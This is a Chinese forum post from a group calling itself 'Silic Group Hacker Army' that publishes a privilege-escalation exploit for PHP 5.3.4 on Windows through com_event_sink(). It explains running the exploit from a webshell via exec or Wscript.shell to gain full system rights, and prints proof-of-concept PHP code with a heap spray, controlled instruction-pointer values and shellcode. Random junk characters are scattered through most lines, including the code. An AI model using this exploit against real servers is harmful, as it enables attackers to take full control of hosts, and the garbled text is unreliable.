PHP 5.3.4(WIN) COM_SINK权限提升漏洞

admin

PHP最新版已经更新至5.4.x，不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
8 p1 T5 c6 z- W$ \# q: h
$ |# d1 B  V1 X: B测试方法如下：cmd /c x:\php\php.exe x:\test.php
, M/ [( M' J- y6 L. G- m' ?6 o: R
# L6 s, Z% r. M0 S( Q下载php程序至本地，然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行，或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
这里是两个测试的截图：

5 |+ M* c" u: v" j" z0 X# R: t
, v: B* c+ |% c$ Y( U0 ?
4 _, L* J8 `* Y- m! o

成功利用此漏洞的攻击者将获得系统的最高权限


( T, J  C2 N# o4 p; c

* t* I1 a1 |$ Y3 Z
关于漏洞分析稍后附上。一下是PoC代码：
% v' P3 H8 g9 o8 `
<?php
' O6 I# n* i5 y) T//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
* F- |$ a3 w. y) G//$eip ="\x44\x43\x42\x41";
$eip= "\x4b\xe8\x57\x78";
$eax ="\x80\x01\x8d\x04";
$deodrant="";
$axespray = str_repeat($eip.$eax,0x80);
: T( D8 \5 T5 _# W5 a' n0 M0 X! S//048d0190
echo strlen($axespray);
& ^, W* l+ L# R$ r! G9 ~echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
& w" V$ ]  w- _# j9 s( M//19200 ==4B32 4b00
2 S! @: V" d, Z1 B( \5 \for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
9 v- D( `9 B9 \. R$terminate = "T";
/ M0 E* `8 v6 C8 f$u[] =$deodrant;
1 R% C5 m% L. g; x, m$r[] =$deodrant.$terminate;
8 A1 q( o+ ]9 C# O4 B4 V6 k% ]  j, j7 \$a[] =$deodrant.$terminate;
  ?2 j! b! B8 H5 L+ o$s[] =$deodrant.$terminate;
8 I1 B$ Z9 e/ c" G* B' H+ }6 x//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
$vVar = new VARIANT(0x048d0000+180);
8 T2 m: p0 ]$ z" o//弹窗代码(Shellcode)
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
4 f7 ?3 Z" @0 v( M4 H  e$var2 = new VARIANT(0x41414242);
/ f  p" b3 H' T) S: N) w/ |/ wcom_event_sink($vVar,$var2,$buffer);
& u+ ?, v; G9 k& d. j: ^?>
' n+ ^/ J$ [4 w